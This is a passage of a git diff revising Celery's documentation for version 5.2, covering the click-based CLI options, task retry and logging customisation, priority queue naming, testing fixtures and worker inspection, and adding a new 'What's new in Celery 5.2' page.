+:command:`systemctl daemon-reload` in order that Systemd acknowledges that file.
+You should also run that command each time you modify it.
+Use :command:`systemctl enable celerybeat.service` if you want the celery beat
+service to automatically start when (re)booting the system.
Running the worker with superuser privileges (root)
======================================================================
diff --git a/docs/userguide/debugging.rst b/docs/userguide/debugging.rst
index 4eeb539be36..690e2acb4bd 100644
--- a/docs/userguide/debugging.rst
+++ b/docs/userguide/debugging.rst
@@ -110,7 +110,7 @@ For example starting the worker with:
.. code-block:: console
- $ CELERY_RDBSIG=1 celery worker -l info
+ $ CELERY_RDBSIG=1 celery worker -l INFO
You can start an rdb session for any of the worker processes by executing:
diff --git a/docs/userguide/extending.rst b/docs/userguide/extending.rst
index 969eb72a51c..59c8f83401e 100644
--- a/docs/userguide/extending.rst
+++ b/docs/userguide/extending.rst
@@ -301,6 +301,32 @@ Another example could use the timer to wake up at regular intervals:
if req.time_start and time() - req.time_start > self.timeout:
raise SystemExit()
+Customizing Task Handling Logs
+------------------------------
+
+The Celery worker emits messages to the Python logging subsystem for various
+events throughout the lifecycle of a task.
+These messages can be customized by overriding the ``LOG_`` format
+strings which are defined in :file:`celery/app/trace.py`.
+For example:
+
+.. code-block:: python
+
+ import celery.app.trace
+
+ celery.app.trace.LOG_SUCCESS = "This is a custom message"
+
+The various format strings are all provided with the task name and ID for
+``%`` formatting, and some of them receive extra fields like the return value
+or the exception which caused a task to fail.
+These fields can be used in custom format strings like so:
+
+.. code-block:: python
+
+ import celery.app.trace
+
+ celery.app.trace.LOG_REJECTED = "%(name)r is cursed and I won't run it: %(exc)s"
+
.. _extending-consumer_blueprint:
Consumer
@@ -729,25 +755,22 @@ You can add additional command-line options to the ``worker``, ``beat``, and
``events`` commands by modifying the :attr:`~@user_options` attribute of the
application instance.
-Celery commands uses the :mod:`argparse` module to parse command-line
-arguments, and so to add custom arguments you need to specify a callback
-that takes a :class:`argparse.ArgumentParser` instance - and adds arguments.
-Please see the :mod:`argparse` documentation to read about the fields supported.
+Celery commands use the :mod:`click` module to parse command-line
+arguments, and so to add custom arguments you need to add :class:`click.Option` instances
+to the relevant set.
Example adding a custom option to the :program:`celery worker` command:
.. code-block:: python
from celery import Celery
+ from click import Option
app = Celery(broker='amqp://')
- def add_worker_arguments(parser):
- parser.add_argument(
- '--enable-my-option', action='store_true', default=False,
- help='Enable custom option.',
- ),
- app.user_options['worker'].add(add_worker_arguments)
+ app.user_options['worker'].add(Option(('--enable-my-option',),
+ is_flag=True,
+ help='Enable custom option.'))
All bootsteps will now receive this argument as a keyword argument to
@@ -772,29 +795,22 @@ Preload options
~~~~~~~~~~~~~~~
The :program:`celery` umbrella command supports the concept of 'preload
-options'. These are special options passed to all sub-commands and parsed
-outside of the main parsing step.
-
-The list of default preload options can be found in the API reference:
-:mod:`celery.bin.base`.
+options'. These are special options passed to all sub-commands.
-You can add new preload options too, for example to specify a configuration
+You can add new preload options, for example to specify a configuration
template:
.. code-block:: python
from celery import Celery
from celery import signals
- from celery.bin import Option
+ from click import Option
app = Celery()
- def add_preload_options(parser):
- parser.add_argument(
- '-Z', '--template', default='default',
- help='Configuration template to use.',
- )
- app.user_options['preload'].add(add_preload_options)
+ app.user_options['preload'].add(Option(('-Z', '--template'),
+ default='default',
+ help='Configuration template to use.'))
@signals.user_preload_options.connect
def on_preload_parsed(options, **kwargs):
@@ -816,12 +832,10 @@ Entry-points is special meta-data that can be added to your packages ``setup.py`
and then after installation, read from the system using the :mod:`pkg_resources` module.
Celery recognizes ``celery.commands`` entry-points to install additional
-sub-commands, where the value of the entry-point must point to a valid subclass
-of :class:`celery.bin.base.Command`. There's limited documentation,
-unfortunately, but you can find inspiration from the various commands in the
-:mod:`celery.bin` package.
+sub-commands, where the value of the entry-point must point to a valid click
+command.
-This is how the :pypi:`Flower` monitoring extension adds the :program:`celery flower` command,
+This is how the :pypi:`Flower` monitoring extension may add the :program:`celery flower` command,
by adding an entry-point in :file:`setup.py`:
.. code-block:: python
@@ -830,44 +844,35 @@ by adding an entry-point in :file:`setup.py`:
name='flower',
entry_points={
'celery.commands': [
- 'flower = flower.command:FlowerCommand',
+ 'flower = flower.command:flower',
],
}
)
The command definition is in two parts separated by the equal sign, where the
first part is the name of the sub-command (flower), then the second part is
-the fully qualified symbol path to the class that implements the command:
+the fully qualified symbol path to the function that implements the command:
.. code-block:: text
- flower.command:FlowerCommand
+ flower.command:flower
The module path and the name of the attribute should be separated by colon
as above.
-In the module :file:`flower/command.py`, the command class is defined
-something like this:
+In the module :file:`flower/command.py`, the command function may be defined
+as follows:
.. code-block:: python
- from celery.bin.base import Command
-
-
- class FlowerCommand(Command):
-
- def add_arguments(self, parser):
- parser.add_argument(
- '--port', default=8888, type='int',
- help='Webserver port',
- ),
- parser.add_argument(
- '--debug', action='store_true',
- )
+ import click
- def run(self, port=None, debug=False, **kwargs):
- print('Running our command')
+ @click.command()
+ @click.option('--port', default=8888, type=int, help='Webserver port')
+ @click.option('--debug', is_flag=True)
+ def flower(port, debug):
+ print('Running our command')
Worker API
diff --git a/docs/userguide/monitoring.rst b/docs/userguide/monitoring.rst
index 40e9991b572..725f264057f 100644
--- a/docs/userguide/monitoring.rst
+++ b/docs/userguide/monitoring.rst
@@ -33,7 +33,7 @@ To list all the commands available do:
.. code-block:: console
- $ celery help
+ $ celery --help
or to get help for a specific command do:
diff --git a/docs/userguide/periodic-tasks.rst b/docs/userguide/periodic-tasks.rst
index e68bcd26c50..718f4c8af90 100644
--- a/docs/userguide/periodic-tasks.rst
+++ b/docs/userguide/periodic-tasks.rst
@@ -107,12 +107,18 @@ beat schedule list.
def test(arg):
print(arg)
+ @app.task
+ def add(x, y):
+ z = x + y
+ print(z)
+
+
Setting these up from within the :data:`~@on_after_configure` handler means
-that we'll not evaluate the app at module level when using ``test.s()``. Note that
+that we'll not evaluate the app at module level when using ``test.s()``. Note that
:data:`~@on_after_configure` is sent after the app is set up, so tasks outside the
-module where the app is declared (e.g. in a `tasks.py` file located by
-:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
+module where the app is declared (e.g. in a `tasks.py` file located by
+:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
:data:`~@on_after_finalize`.
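+
+For instance, a minimal sketch along these lines could register the periodic
+task from the later signal (the ``proj.tasks`` module and the ``add`` task are
+assumed names here):
+
+.. code-block:: python
+
+    @app.on_after_finalize.connect
+    def setup_periodic_tasks(sender, **kwargs):
+        # tasks from all discovered modules are registered at this point
+        from proj.tasks import add
+        sender.add_periodic_task(10.0, add.s(2, 2), name='add every 10s')
+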
The :meth:`~@add_periodic_task` function will add the entry to the
@@ -186,7 +192,7 @@ Available Fields
Execution options (:class:`dict`).
This can be any argument supported by
- :meth:`~celery.task.base.Task.apply_async` --
+ :meth:`~celery.app.task.Task.apply_async` --
`exchange`, `routing_key`, `expires`, and so on.
* `relative`
@@ -463,7 +469,7 @@ To install and use this extension:
.. code-block:: console
- $ celery -A proj beat -l info --scheduler django_celery_beat.schedulers:DatabaseScheduler
+ $ celery -A proj beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler
Note: You may also add this as the :setting:`beat_scheduler` setting directly.
diff --git a/docs/userguide/routing.rst b/docs/userguide/routing.rst
index 300c655a12d..1dbac6807cf 100644
--- a/docs/userguide/routing.rst
+++ b/docs/userguide/routing.rst
@@ -274,22 +274,34 @@ To start scheduling tasks based on priorities you need to configure queue_order_
The priority support is implemented by creating n lists for each queue.
This means that even though there are 10 (0-9) priority levels, these are
consolidated into 4 levels by default to save resources. This means that a
-queue named celery will really be split into 4 queues:
+queue named celery will really be split into 4 queues.
+
+The highest priority queue will be named celery, and the other queues will
+have a separator (by default `\x06\x16`) and their priority number appended to
+the queue name.
.. code-block:: python
- ['celery0', 'celery3', 'celery6', 'celery9']
+ ['celery', 'celery\x06\x163', 'celery\x06\x166', 'celery\x06\x169']
-If you want more priority levels you can set the priority_steps transport option:
+If you want more priority levels or a different separator you can set the
+priority_steps and sep transport options:
.. code-block:: python
app.conf.broker_transport_options = {
'priority_steps': list(range(10)),
+ 'sep': ':',
'queue_order_strategy': 'priority',
}
+The config above will give you these queue names:
+
+.. code-block:: python
+
+ ['celery', 'celery:1', 'celery:2', 'celery:3', 'celery:4', 'celery:5', 'celery:6', 'celery:7', 'celery:8', 'celery:9']
+
That said, note that this will never be as good as priorities implemented at the
server level, and may be approximate at best. But it may still be good enough
@@ -624,7 +636,7 @@ Specifying task destination
The destination for a task is decided by the following (in order):
1. The routing arguments to :func:`Task.apply_async`.
-2. Routing related attributes defined on the :class:`~celery.task.base.Task`
+2. Routing related attributes defined on the :class:`~celery.app.task.Task`
itself.
3. The :ref:`routers` defined in :setting:`task_routes`.
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 58e4125cac9..49c4dd68337 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -64,11 +64,12 @@ consider enabling the :setting:`task_reject_on_worker_lost` setting.
the process by force so only use them to detect cases where you haven't
used manual timeouts yet.
- The default prefork pool scheduler is not friendly to long-running tasks,
- so if you have tasks that run for minutes/hours make sure you enable
- the :option:`-Ofair ` command-line argument to
- the :program:`celery worker`. See :ref:`optimizing-prefetch-limit` for more
- information, and for the best performance route long-running and
+ In previous versions, the default prefork pool scheduler was not friendly
+ to long-running tasks, so if you had tasks that ran for minutes/hours, it
+ was advised to enable the :option:`-Ofair ` command-line
+ argument to the :program:`celery worker`. However, as of version 4.0,
+ ``-Ofair`` is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit`
+ for more information, and for the best performance route long-running and
short-running tasks to dedicated workers (:ref:`routing-automatic`).
If your worker hangs then please investigate what tasks are running
@@ -91,7 +92,7 @@ Basics
======
You can easily create a task from any callable by using
-the :meth:`~@task` decorator:
+the :meth:`@task` decorator:
.. code-block:: python
@@ -153,7 +154,7 @@ be the task instance (``self``), just like Python bound methods:
logger = get_task_logger(__name__)
- @task(bind=True)
+ @app.task(bind=True)
def add(self, x, y):
logger.info(self.request.id)
@@ -175,7 +176,7 @@ The ``base`` argument to the task decorator specifies the base class of the task
def on_failure(self, exc, task_id, args, kwargs, einfo):
print('{0!r} failed: {1!r}'.format(task_id, exc))
- @task(base=MyTask)
+ @app.task(base=MyTask)
def add(x, y):
raise KeyError()
@@ -236,92 +237,6 @@ named :file:`tasks.py`:
>>> add.name
'tasks.add'
-.. _task-naming-relative-imports:
-
-Automatic naming and relative imports
--------------------------------------
-
-.. sidebar:: Absolute Imports
-
- The best practice for developers targeting Python 2 is to add the
- following to the top of **every module**:
-
- .. code-block:: python
-
- from __future__ import absolute_import
-
- This will force you to always use absolute imports so you will
- never have any problems with tasks using relative names.
-
- Absolute imports are the default in Python 3 so you don't need this
- if you target that version.
-
-Relative imports and automatic name generation don't go well together,
-so if you're using relative imports you should set the name explicitly.
-
-For example if the client imports the module ``"myapp.tasks"``
-as ``".tasks"``, and the worker imports the module as ``"myapp.tasks"``,
-the generated names won't match and an :exc:`~@NotRegistered` error will
-be raised by the worker.
-
-This is also the case when using Django and using ``project.myapp``-style
-naming in ``INSTALLED_APPS``:
-
-.. code-block:: python
-
- INSTALLED_APPS = ['project.myapp']
-
-If you install the app under the name ``project.myapp`` then the
-tasks module will be imported as ``project.myapp.tasks``,
-so you must make sure you always import the tasks using the same name:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask # << GOOD
-
- >>> from myapp.tasks import mytask # << BAD!!!
-
-The second example will cause the task to be named differently
-since the worker and the client imports the modules under different names:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask
- >>> mytask.name
- 'project.myapp.tasks.mytask'
-
- >>> from myapp.tasks import mytask
- >>> mytask.name
- 'myapp.tasks.mytask'
-
-For this reason you must be consistent in how you
-import modules, and that is also a Python best practice.
-
-Similarly, you shouldn't use old-style relative imports:
-
-.. code-block:: python
-
- from module import foo # BAD!
-
- from proj.module import foo # GOOD!
-
-New-style relative imports are fine and can be used:
-
-.. code-block:: python
-
- from .module import foo # GOOD!
-
-If you want to use Celery with a project already using these patterns
-extensively and you don't have the time to refactor the existing code
-then you can consider specifying the names explicitly instead of relying
-on the automatic naming:
-
-.. code-block:: python
-
- @task(name='proj.tasks.add')
- def add(x, y):
- return x + y
-
.. _task-name-generator-info:
Changing the automatic naming behavior
@@ -359,7 +274,7 @@ may contain:
def gen_task_name(self, name, module):
if module.endswith('.tasks'):
module = module[:-6]
- return super(MyCelery, self).gen_task_name(name, module)
+ return super().gen_task_name(name, module)
app = MyCelery('main')
@@ -457,6 +372,14 @@ The request defines the following attributes:
current task. If using version one of the task protocol the chain
tasks will be in ``request.callbacks`` instead.
+.. versionadded:: 5.2
+
+:properties: Mapping of message properties received with this task message
+ (may be :const:`None` or :const:`{}`)
+
+:replaced_task_nesting: How many times the task was replaced, if at all.
+ (may be :const:`0`)
+
Example
-------
@@ -742,7 +665,7 @@ Sometimes you just want to retry a task whenever a particular exception
is raised.
Fortunately, you can tell Celery to automatically retry a task using
-`autoretry_for` argument in the :meth:`~@Celery.task` decorator:
+`autoretry_for` argument in the :meth:`@task` decorator:
.. code-block:: python
@@ -753,7 +676,7 @@ Fortunately, you can tell Celery to automatically retry a task using
return twitter.refresh_timeline(user)
If you want to specify custom arguments for an internal :meth:`~@Task.retry`
-call, pass `retry_kwargs` argument to :meth:`~@Celery.task` decorator:
+call, pass `retry_kwargs` argument to :meth:`@task` decorator:
.. code-block:: python
@@ -805,13 +728,13 @@ via options documented below.
.. versionadded:: 4.4
-You can also set `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` options in class-based tasks:
+You can also set `autoretry_for`, `max_retries`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` options in class-based tasks:
.. code-block:: python
class BaseTaskWithRetry(Task):
autoretry_for = (TypeError,)
- retry_kwargs = {'max_retries': 5}
+ max_retries = 5
retry_backoff = True
retry_backoff_max = 700
retry_jitter = False
@@ -822,12 +745,10 @@ You can also set `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backof
during the execution of the task, the task will automatically be retried.
By default, no exceptions will be autoretried.
-.. attribute:: Task.retry_kwargs
+.. attribute:: Task.max_retries
- A dictionary. Use this to customize how autoretries are executed.
- Note that if you use the exponential backoff options below, the `countdown`
- task option will be determined by Celery's autoretry system, and any
- `countdown` included in this dictionary will be ignored.
+ A number. Maximum number of retries before giving up. A value of ``None``
+ means the task will retry forever. By default, this option is set to ``3``.
.. attribute:: Task.retry_backoff
@@ -1522,6 +1443,18 @@ The default value is the class provided by Celery: ``'celery.app.task:Task'``.
Handlers
--------
+.. method:: before_start(self, task_id, args, kwargs)
+
+ Run by the worker before the task starts executing.
+
+ .. versionadded:: 5.2
+
+ :param task_id: Unique id of the task to execute.
+ :param args: Original arguments for the task to execute.
+ :param kwargs: Original keyword arguments for the task to execute.
+
+ The return value of this handler is ignored.
+
.. method:: after_return(self, status, retval, task_id, args, kwargs, einfo)
Handler called after the task returns.
@@ -1607,6 +1540,7 @@ limits, and other failures.
.. code-block:: python
import logging
+ from celery import Task
from celery.worker.request import Request
logger = logging.getLogger('my.package')
@@ -1623,7 +1557,7 @@ limits, and other failures.
)
def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
- super(Request, self).on_failure(
+ super().on_failure(
exc_info,
send_failed_event=send_failed_event,
return_ok=return_ok
diff --git a/docs/userguide/testing.rst b/docs/userguide/testing.rst
index 4deccd0f15c..3f2f15ba680 100644
--- a/docs/userguide/testing.rst
+++ b/docs/userguide/testing.rst
@@ -18,6 +18,9 @@ To test task behavior in unit tests the preferred method is mocking.
of what happens in a worker, and there are many discrepancies
between the emulation and what happens in reality.
+ Note that eagerly executed tasks don't write results to the result backend by default.
+ If you want to enable this functionality, have a look at :setting:`task_store_eager_result`.
+
A Celery task is much like a web view, in that it should only
define how to perform the action in the context of being called as a task.
@@ -103,9 +106,10 @@ Enabling
Celery initially ships the plugin in a disabled state, to enable it you can either:
- * `pip install celery[pytest]`
- * `pip install pytest-celery`
- * or add `pytest_plugins = 'celery.contrib.pytest'` to your pytest.ini
+ * ``pip install celery[pytest]``
+ * ``pip install pytest-celery``
+ * or add an environment variable ``PYTEST_PLUGINS=celery.contrib.pytest``
+ * or add ``pytest_plugins = ("celery.contrib.pytest", )`` to your root conftest.py
Marks
@@ -166,6 +170,11 @@ This fixture starts a Celery worker instance that you can use
for integration tests. The worker will be started in a *separate thread*
and will be shutdown as soon as the test returns.
+By default the fixture will wait up to 10 seconds for the worker to complete
+outstanding tasks and will raise an exception if the time limit is exceeded.
+The timeout can be customized by setting the ``shutdown_timeout`` key in the
+dictionary returned by the :func:`celery_worker_parameters` fixture.
+
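+For instance, a conftest fixture along these lines (a sketch; 30 seconds is
+just an example value) would extend the shutdown timeout:
+
+.. code-block:: python
+
+    # Put this in your conftest.py
+    import pytest
+
+    @pytest.fixture(scope="session")
+    def celery_worker_parameters():
+        # allow the test worker up to 30 seconds to finish outstanding tasks
+        return {"shutdown_timeout": 30}
+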
Example:
.. code-block:: python
@@ -188,6 +197,20 @@ Example:
def test_other(celery_worker):
...
+Heartbeats are disabled by default, which means that the test worker doesn't
+send events for ``worker-online``, ``worker-offline`` and ``worker-heartbeat``.
+To enable heartbeats, modify the :func:`celery_worker_parameters` fixture:
+
+.. code-block:: python
+
+ # Put this in your conftest.py
+ @pytest.fixture(scope="session")
+ def celery_worker_parameters():
+ return {"without_heartbeat": False}
+ ...
+
+
Session scope
^^^^^^^^^^^^^
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index 098d3005f68..1e51c915e67 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -23,7 +23,7 @@ You can start the worker in the foreground by executing the command:
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
For a full list of available command-line options see
:mod:`~celery.bin.worker`, or simply do:
@@ -97,6 +97,11 @@ longer version:
$ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9
+.. versionchanged:: 5.2
+ On Linux systems, Celery now supports sending the :sig:`KILL` signal to all child processes
+ after worker termination. This is done via the `PR_SET_PDEATHSIG` option of ``prctl(2)``.
+
+
.. _worker-restarting:
Restarting the worker
@@ -108,7 +113,7 @@ is by using `celery multi`:
.. code-block:: console
- $ celery multi start 1 -A proj -l info -c4 --pidfile=/var/run/celery/%n.pid
+ $ celery multi start 1 -A proj -l INFO -c4 --pidfile=/var/run/celery/%n.pid
$ celery multi restart 1 --pidfile=/var/run/celery/%n.pid
For production deployments you should be using init-scripts or a process
@@ -324,7 +329,7 @@ Commands
``revoke``: Revoking tasks
--------------------------
-:pool support: all, terminate only supported by prefork
+:pool support: all, terminate only supported by prefork and eventlet
:broker support: *amqp, redis*
:command: :program:`celery -A proj control revoke `
@@ -410,7 +415,7 @@ argument to :program:`celery worker`:
.. code-block:: console
- $ celery -A proj worker -l info --statedb=/var/run/celery/worker.state
+ $ celery -A proj worker -l INFO --statedb=/var/run/celery/worker.state
or if you use :program:`celery multi` you want to create one file per
worker instance so use the `%n` format to expand the current node
@@ -418,7 +423,7 @@ name:
.. code-block:: console
- celery multi start 2 -l info --statedb=/var/run/celery/%n.state
+ celery multi start 2 -l INFO --statedb=/var/run/celery/%n.state
See also :ref:`worker-files`
@@ -434,7 +439,7 @@ Time Limits
.. versionadded:: 2.0
-:pool support: *prefork/gevent*
+:pool support: *prefork/gevent (see note below)*
.. sidebar:: Soft, or hard?
@@ -474,6 +479,11 @@ Time limits can also be set using the :setting:`task_time_limit` /
Time limits don't currently work on platforms that don't support
the :sig:`SIGUSR1` signal.
+.. note::
+
+ The gevent pool does not implement soft time limits. Additionally,
+ it will not enforce the hard time limit if the task is blocking.
+
Changing time limits at run-time
--------------------------------
@@ -611,7 +621,7 @@ separated list of queues to the :option:`-Q ` option:
.. code-block:: console
- $ celery -A proj worker -l info -Q foo,bar,baz
+ $ celery -A proj worker -l INFO -Q foo,bar,baz
If the queue name is defined in :setting:`task_queues` it will use that
configuration, but if it's not defined in the list of queues Celery will
@@ -732,7 +742,7 @@ to specify the workers that should reply to the request:
This can also be done programmatically by using the
-:meth:`@control.inspect.active_queues` method:
+:meth:`~celery.app.control.Inspect.active_queues` method:
.. code-block:: pycon
@@ -771,7 +781,7 @@ Dump of registered tasks
------------------------
You can get a list of tasks registered in the worker using the
-:meth:`~@control.inspect.registered`:
+:meth:`~celery.app.control.Inspect.registered`:
.. code-block:: pycon
@@ -785,7 +795,7 @@ Dump of currently executing tasks
---------------------------------
You can get a list of active tasks using
-:meth:`~@control.inspect.active`:
+:meth:`~celery.app.control.Inspect.active`:
.. code-block:: pycon
@@ -802,7 +812,7 @@ Dump of scheduled (ETA) tasks
-----------------------------
You can get a list of tasks waiting to be scheduled by using
-:meth:`~@control.inspect.scheduled`:
+:meth:`~celery.app.control.Inspect.scheduled`:
.. code-block:: pycon
@@ -834,7 +844,7 @@ Reserved tasks are tasks that have been received, but are still waiting to be
executed.
You can get a list of these using
-:meth:`~@control.inspect.reserved`:
+:meth:`~celery.app.control.Inspect.reserved`:
.. code-block:: pycon
@@ -852,201 +862,14 @@ Statistics
----------
The remote control command ``inspect stats`` (or
-:meth:`~@control.inspect.stats`) will give you a long list of useful (or not
+:meth:`~celery.app.control.Inspect.stats`) will give you a long list of useful (or not
so useful) statistics about the worker:
.. code-block:: console
$ celery -A proj inspect stats
-The output will include the following fields:
-
-- ``broker``
-
- Section for broker information.
-
- * ``connect_timeout``
-
- Timeout in seconds (int/float) for establishing a new connection.
-
- * ``heartbeat``
-
- Current heartbeat value (set by client).
-
- * ``hostname``
-
- Node name of the remote broker.
-
- * ``insist``
-
- No longer used.
-
- * ``login_method``
-
- Login method used to connect to the broker.
-
- * ``port``
-
- Port of the remote broker.
-
- * ``ssl``
-
- SSL enabled/disabled.
-
- * ``transport``
-
- Name of transport used (e.g., ``amqp`` or ``redis``)
-
- * ``transport_options``
-
- Options passed to transport.
-
- * ``uri_prefix``
-
- Some transports expects the host name to be a URL.
-
- .. code-block:: text
-
- redis+socket:///tmp/redis.sock
-
- In this example the URI-prefix will be ``redis``.
-
- * ``userid``
-
- User id used to connect to the broker with.
-
- * ``virtual_host``
-
- Virtual host used.
-
-- ``clock``
-
- Value of the workers logical clock. This is a positive integer and should
- be increasing every time you receive statistics.
-
-- ``uptime``
-
- Numbers of seconds since the worker controller was started
-
-- ``pid``
-
- Process id of the worker instance (Main process).
-
-- ``pool``
-
- Pool-specific section.
-
- * ``max-concurrency``
-
- Max number of processes/threads/green threads.
-
- * ``max-tasks-per-child``
-
- Max number of tasks a thread may execute before being recycled.
-
- * ``processes``
-
- List of PIDs (or thread-id's).
-
- * ``put-guarded-by-semaphore``
-
- Internal
-
- * ``timeouts``
-
- Default values for time limits.
-
- * ``writes``
-
- Specific to the prefork pool, this shows the distribution of writes
- to each process in the pool when using async I/O.
-
-- ``prefetch_count``
-
- Current prefetch count value for the task consumer.
-
-- ``rusage``
-
- System usage statistics. The fields available may be different
- on your platform.
-
- From :manpage:`getrusage(2)`:
-
- * ``stime``
-
- Time spent in operating system code on behalf of this process.
-
- * ``utime``
-
- Time spent executing user instructions.
-
- * ``maxrss``
-
- The maximum resident size used by this process (in kilobytes).
-
- * ``idrss``
-
- Amount of non-shared memory used for data (in kilobytes times ticks of
- execution)
-
- * ``isrss``
-
- Amount of non-shared memory used for stack space (in kilobytes times
- ticks of execution)
-
- * ``ixrss``
-
- Amount of memory shared with other processes (in kilobytes times
- ticks of execution).
-
- * ``inblock``
-
- Number of times the file system had to read from the disk on behalf of
- this process.
-
- * ``oublock``
-
- Number of times the file system has to write to disk on behalf of
- this process.
-
- * ``majflt``
-
- Number of page faults that were serviced by doing I/O.
-
- * ``minflt``
-
- Number of page faults that were serviced without doing I/O.
-
- * ``msgrcv``
-
- Number of IPC messages received.
-
- * ``msgsnd``
-
- Number of IPC messages sent.
-
- * ``nvcsw``
-
- Number of times this process voluntarily invoked a context switch.
-
- * ``nivcsw``
-
- Number of times an involuntary context switch took place.
-
- * ``nsignals``
-
- Number of signals received.
-
- * ``nswap``
-
- The number of times this process was swapped entirely out of memory.
-
-
-- ``total``
-
- Map of task names and the total number of tasks with that type
- the worker has accepted since start-up.
-
+For the output details, consult the reference documentation of :meth:`~celery.app.control.Inspect.stats`.
Additional Commands
===================
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
new file mode 100644
index 00000000000..1180a653c63
--- /dev/null
+++ b/docs/whatsnew-5.2.rst
@@ -0,0 +1,393 @@
+.. _whatsnew-5.2:
+
+=========================================
+ What's new in Celery 5.2 (Dawn Chorus)
+=========================================
+:Author: Omer Katz (``omer.drow at gmail.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions;
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with Python.
+
+It's a task queue with a focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors;
+you should come join us :ref:`on IRC `
+or :ref:`our mailing-list `.
+
+.. note::
+
+ Following the problems with Freenode, we migrated our IRC channel to Libera Chat
+ as most projects did.
+ You can also join us using `Gitter `_.
+
+ We're sometimes there to answer questions. We welcome you to join.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions,
+it's important that you read the following section as this release
+is a new minor version.
+
+This version is officially supported on CPython 3.7 & 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+.. note::
+
+ **This release contains fixes for two (potentially severe) memory leaks.
+ We encourage our users to upgrade to this release as soon as possible.**
+
+The 5.2.0 release is a new minor release for Celery.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Dawn Chorus `_.
+
+From now on we only support Python 3.7 and above.
+We will maintain compatibility with Python 3.7 until it reaches
+EOL in June 2023.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+We no longer support Celery 4.x as we don't have the resources to do so.
+If you'd like to help us, all contributions are welcome.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.2
+-----------------------------
+
+At this point you can upgrade your workers and clients to the new version.
+
+.. _v520-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python versions are:
+
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.7 7.3 (``pypy3``)
+
+Experimental support
+~~~~~~~~~~~~~~~~~~~~
+
+Celery supports these Python versions provisionally as they are not production
+ready yet:
+
+- CPython 3.10 (currently in RC2)
+
+Memory Leak Fixes
+-----------------
+
+Two severe memory leaks have been fixed in this version:
+
+* :class:`celery.result.ResultSet` no longer holds a circular reference to itself.
+* The prefork pool no longer keeps messages in its cache forever when the master
+ process disconnects from the broker.
+
+The first memory leak occurred when you used :class:`celery.result.ResultSet`.
+Each instance held a promise which received that instance as an argument to
+the promise's callable.
+This caused a circular reference which kept the ResultSet instance in memory
+forever since the GC couldn't evict it.
+The provided argument is now a :func:`weakref.proxy` of the ResultSet
+instance.
+In practice the leak mainly affected :class:`celery.result.GroupResult`,
+since it inherits from :class:`celery.result.ResultSet`, which is rarely
+used directly.
+
+The second memory leak has existed since the inception of the project.
+The prefork pool maintains a cache of the jobs it executes.
+When they are complete, they are evicted from the cache.
+However, when Celery disconnects from the broker, we flush the pool
+and discard the jobs, expecting that they'll be cleared later once the worker
+acknowledges them, but that has never been the case.
+Instead, these jobs remained in memory forever.
+We now discard those jobs immediately while flushing.
+
+Dropped support for Python 3.6
+------------------------------
+
+Celery now requires Python 3.7 and above.
+
+Python 3.6 will reach EOL in December, 2021.
+In order to focus our efforts we have dropped support for Python 3.6 in
+this version.
+
+If you still need to run Celery on Python 3.6,
+you can still use Celery 5.1.
+However, we encourage you to upgrade to a supported Python version since
